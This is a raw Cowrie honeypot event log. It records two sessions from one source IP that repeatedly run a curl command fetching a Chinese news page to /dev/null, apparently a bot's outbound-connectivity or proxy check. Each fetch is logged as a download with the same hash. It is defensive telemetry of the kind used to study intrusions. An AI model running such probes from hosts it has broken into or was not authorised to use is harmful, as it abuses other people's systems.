{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.283332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.285770Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.286431Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.296371Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.319593Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.320910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.321641Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.323789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.324479Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.333142Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.358810Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.359756Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.377807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.379368Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.383548Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.402003Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.410449Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.411928Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.419864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.420937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.429641Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.442303Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.447086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.447915Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.452748Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.458077Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.458961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.460895Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.479815Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.483228Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.484115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.496572Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.498007Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.520369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.521217Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.523735Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.537107Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.539379Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.543887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.545188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.549138Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.555483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.556561Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.586267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.587265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.606325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.609818Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.611062Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.616075Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.628053Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.637115Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.643456Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.644326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.647482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.649056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.655647Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.658796Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.660507Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.662319Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.667506Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.681262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.682238Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.686730Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.688392Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.700549Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.703422Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.716684Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.720979Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.721897Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.724462Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.725080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.731210Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.760561Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.761670Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.764601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.765529Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.768031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.781655Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:47.790447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:47.799754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
